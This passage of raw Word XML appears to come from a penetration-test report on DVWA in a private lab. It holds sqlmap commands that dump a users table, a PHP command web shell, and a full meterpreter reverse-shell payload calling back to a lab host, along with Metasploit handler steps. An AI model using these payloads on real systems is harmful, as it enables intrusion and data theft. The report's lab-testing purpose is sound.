        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:p w14:paraId="24763FEA" w14:textId="6D1EF9BC" w:rsidR="00693385" w:rsidRPr="0034765E" w:rsidRDefault="00BD3893" w:rsidP="00BD3893">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="585F90DD" wp14:editId="654559F5">
            <wp:extent cx="4963218" cy="790685"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="14149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3734" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4963218" cy="790685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A219EB" w14:textId="77777777" w:rsidR="008E4AAB" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087C5E7B" w14:textId="3D4ABF85" w:rsidR="008E4AAB" w:rsidRPr="0034765E" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="008E4AAB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Automated Exploitation with SQLmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2641465D" w14:textId="77777777" w:rsidR="008E4AAB" w:rsidRPr="0034765E" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">    - Step 1: Running SQLmap to retrieve databases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313521AC" w14:textId="486C1483" w:rsidR="008E4AAB" w:rsidRPr="008E4AAB" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">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8E4AAB">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">       sqlmap -u "http://192.168.2.129/dvwa/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#" --cookie="security=low; PHPSESSID=4gje1qipmb20v17efttu9hh7ov"</w:t>
      </w:r>
      <w:r w:rsidR="00911F12">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E598CB0" w14:textId="77777777" w:rsidR="008E4AAB" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">
      <w:pPr>
        <w:ind w:left="810" w:hanging="450"/>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">      Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C772789" w14:textId="2B8513FC" w:rsidR="008E4AAB" w:rsidRPr="0034765E" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">
      <w:pPr>
        <w:ind w:left="810" w:hanging="450"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B5C655E" wp14:editId="12A9912E">
            <wp:extent cx="5591955" cy="2200582"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="198287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75560" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5591955" cy="2200582"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72348650" w14:textId="77777777" w:rsidR="008E4AAB" w:rsidRPr="0034765E" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">
      <w:pPr>
        <w:ind w:left="810" w:hanging="450"/>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">    - Step 2: Running SQLmap to retrieve tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64119935" w14:textId="7359F9EB" w:rsidR="008E4AAB" w:rsidRPr="0034765E" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">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pPr>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="008E4AAB">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>sqlmap -u "http://192.168.2.129/dvwa/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#" --cookie="security=low; PHPSESSID=059d8852c0771f6daa85b960f82d710f" -</w:t>
      </w:r>
      <w:r w:rsidR="00911F12">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>D dvwa --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122F60B2" w14:textId="77777777" w:rsidR="008E4AAB" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">
      <w:pPr>
        <w:ind w:left="810" w:hanging="450"/>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">     Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9D495B" w14:textId="680B66F1" w:rsidR="008E4AAB" w:rsidRPr="0034765E" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">
      <w:pPr>
        <w:ind w:left="810" w:hanging="450"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="187924CA" wp14:editId="7A8508CF">
            <wp:extent cx="5048955" cy="1924319"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="107956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66122" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5048955" cy="1924319"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="331406D8" w14:textId="77777777" w:rsidR="008E4AAB" w:rsidRPr="0034765E" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">
      <w:pPr>
        <w:ind w:left="810" w:hanging="450"/>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">    - Step 3: Running SQLmap to retrieve columns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22575DB1" w14:textId="171659D7" w:rsidR="008E4AAB" w:rsidRPr="008E4AAB" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">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8E4AAB">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">       sqlmap -u "http://192.168.2.129/dvwa/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#" --cookie="security=low; PHPSESSID=059d8852c0771f6daa85b960f82d710f" -D dvwa -</w:t>
      </w:r>
      <w:r w:rsidR="00911F12">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>T users --columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB2253F" w14:textId="77777777" w:rsidR="008E4AAB" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">
      <w:pPr>
        <w:ind w:left="810" w:hanging="450"/>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">      Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294BA27A" w14:textId="3F7FC9CF" w:rsidR="008E4AAB" w:rsidRPr="0034765E" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">
      <w:pPr>
        <w:ind w:left="810" w:hanging="450"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="246DD98D" wp14:editId="253FB76A">
            <wp:extent cx="5506218" cy="2333951"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="196296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66491" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5506218" cy="2333951"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A4EBD3" w14:textId="77777777" w:rsidR="008E4AAB" w:rsidRPr="0034765E" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">
      <w:pPr>
        <w:ind w:left="810" w:hanging="450"/>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">    - Step 4: Running SQLmap to dump user data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F7DEC3" w14:textId="77777777" w:rsidR="008E4AAB" w:rsidRPr="008E4AAB" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">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8E4AAB">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">       sqlmap -u "http://192.168.2.129/dvwa/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#" --cookie="security=low; PHPSESSID=059d8852c0771f6daa85b960f82d710f" -D dvwa -T users --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A29A1E6" w14:textId="77777777" w:rsidR="008E4AAB" w:rsidRDefault="008E4AAB" w:rsidP="008E4AAB">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">      Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361824FD" w14:textId="5D04C8E5" w:rsidR="00724F44" w:rsidRDefault="008E4AAB" w:rsidP="00911F12">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B9BED1C" wp14:editId="4AEB1B2A">
            <wp:extent cx="5651500" cy="2009775"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="194354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9338" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5651500" cy="2009775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="193EAD4A" w14:textId="77777777" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B4FA8F" w14:textId="3E5BB797" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File Upload Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE00F5F" w14:textId="77777777" w:rsidR="00724F44" w:rsidRPr="00724F44" w:rsidRDefault="00724F44" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574FD6C6" w14:textId="77777777" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Vulnerability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> File Upload Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AB12C6" w14:textId="77777777" w:rsidR="0023763A" w:rsidRDefault="00724F44" w:rsidP="0023763A">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- System Vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA (Damn Vulnerable Web Application) running at </w:t>
      </w:r>
      <w:r w:rsidR="0023763A">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>192.168.2.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747A520B" w14:textId="5B891805" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="0023763A">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Vulnerability Explanation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC4857" w:rsidRPr="00BC4857">
        <w:t>File upload attacks against DVWA are possible, enabling attackers to upload malicious files to the server and perhaps run arbitrary code. Vulnerabilities related to File Upload in DVWA may result in remote code execution, unapproved access to confidential data, and server and web application compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AA5FB8" w14:textId="5AB2BB02" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Vulnerability Fix:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC4857" w:rsidRPr="00BC4857">
        <w:t>Strict file upload validation procedures should be included by developers to limit the kinds and amounts of files that may be submitted in order to reduce File Upload vulnerabilities in DVWA. Furthermore, before being executed, uploaded files must to be checked for malware and kept in a safe area with restricted access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A26C2BB" w14:textId="77777777" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Severity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B7BAB6" w14:textId="77777777" w:rsidR="0097058A" w:rsidRPr="0034765E" w:rsidRDefault="00724F44" w:rsidP="0097058A">
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Proof of Concept Code Here:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0097058A">
        <w:br/>
      </w:r>
      <w:r w:rsidR="0097058A" w:rsidRPr="0097058A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>- Low Security Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0882B110" w14:textId="77777777" w:rsidR="0097058A" w:rsidRPr="0034765E" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  - Step 1: Create a PHP shell file locally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CF573B"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touch new.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6552308C" w14:textId="44E03125" w:rsidR="0097058A" w:rsidRPr="0034765E" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:r w:rsidRPr="0034765E">
        <w:t>- Step 2: Edit the PHP shell file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1D5AF4" w14:textId="77777777" w:rsidR="0097058A" w:rsidRPr="0034765E"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pPr>
      <w:r w:rsidRPr="0097058A">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">     nano new.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A37124B"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new.php file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2014F952" w14:textId="287B2409"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&lt;?php sytem($_REQUEST["cmd"]); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAD7D34" w14:textId="77777777" w:rsidR="0097058A" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">   Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA9197F" w14:textId="3E80348F" w:rsidR="0097058A" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0097058A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="109D173D" wp14:editId="759126B8">
            <wp:extent cx="1695687" cy="857370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="126296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60648" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1695687" cy="857370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0097058A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="576D1F6D" wp14:editId="75A884BA">
            <wp:extent cx="5943600" cy="287655"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25799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2716" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="287655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7D7752" w14:textId="7B43DC4C" w:rsidR="0097058A" w:rsidRPr="0034765E" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:r w:rsidRPr="0034765E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Step 3: Generate a meterpreter reverse shell payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14574681"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msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.2.128 lport=7777 -f raw &gt; exploit.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBE931D" w14:textId="77777777" w:rsidR="0097058A" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">   Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1E74F6" w14:textId="0861B4EF" w:rsidR="0097058A" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:r w:rsidRPr="0097058A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2766D74B" wp14:editId="3A4FF7CD">
            <wp:extent cx="5943600" cy="794385"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="45453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31120" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="794385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6905A812" w14:textId="190D9FB3" w:rsidR="0097058A" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:r w:rsidRPr="0097058A">
        <w:t>Exploit.php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9DED33" w14:textId="1EA2EC60"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rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0097058A">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>/*&lt;?php /**/ error_reporting(0); $ip = '192.168.2.128'; $port = 7777; if (($f = 'stream_socket_client') &amp;&amp; is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s &amp;&amp; ($f = 'fsockopen') &amp;&amp; is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s &amp;&amp; ($f = 'socket_create') &amp;&amp; is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) &lt; $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') &amp;&amp; ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733881CD" w14:textId="3479C866" w:rsidR="0097058A" w:rsidRPr="0034765E" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  - Step 4: Set up Metasploit handler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D8857D"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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6285FB87"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use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490F5231"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set payload php/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD10E12"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set lhost 192.168.2.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E15B46F"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set lport 7777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B7F5BE"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7058A">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">     exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C83472" w14:textId="77777777" w:rsidR="0097058A" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">   Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0990E46A" w14:textId="01FB658C" w:rsidR="0097058A" w:rsidRDefault="00911F12" w:rsidP="00911F12">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00911F12">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24735E5D" wp14:editId="5BE9AA6A">
            <wp:extent cx="5943600" cy="1935480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="71770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6758" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1935480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="795B57AE" w14:textId="169778AC" w:rsidR="0097058A" w:rsidRPr="0034765E" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:r w:rsidRPr="0034765E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Step 5: Upload the PHP file to the vulnerable server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403FB05D" w14:textId="77777777" w:rsidR="0097058A" w:rsidRPr="0097058A" w:rsidRDefault="0097058A" w:rsidP="0097058A">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0097058A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>- Medium Security Level:</w:t>
      </w:r>
    </w:p>
